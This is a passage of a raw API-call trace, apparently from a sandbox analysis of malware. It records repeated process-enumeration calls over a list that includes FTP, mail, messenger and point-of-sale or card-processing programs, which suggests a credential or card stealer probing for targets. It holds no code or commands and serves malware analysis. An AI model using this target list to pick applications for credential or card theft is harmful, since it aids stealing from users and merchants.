th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0243.720] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0243.722] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0243.725] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0243.728] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0243.732] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0243.735] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0243.737] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0243.740] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0243.742] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0243.745] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0243.747] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0243.751] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0243.754] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0243.758] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0243.761] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0243.764] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0243.767] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0243.775] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0243.778] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0243.780] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0243.782] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0243.784] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0243.786] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0243.788] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0243.790] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0243.793] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0243.795] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0243.797] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0243.800] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0243.803] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0243.805] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0243.807] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0243.809] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0243.815] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0243.818] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0243.821] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0243.823] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0243.826] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0243.829] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0243.831] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0243.833] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0243.835] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0243.838] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0243.840] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0243.842] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0243.845] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0243.847] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0243.850] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0243.856] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0243.857] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0243.859] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0243.861] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0243.863] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0243.866] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.868] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0243.870] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.871] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.873] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0243.875] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.878] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0243.879] CloseHandle (hObject=0x22f0) returned 1 [0243.880] Sleep (dwMilliseconds=0x64) [0244.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18d8 [0244.076] Process32First (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.077] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.079] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.081] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.085] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.088] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.090] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.093] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.095] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.098] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.139] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.142] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.144] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.178] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.181] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.185] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.188] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.190] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.192] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.195] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.197] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0244.199] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.201] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0244.204] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, 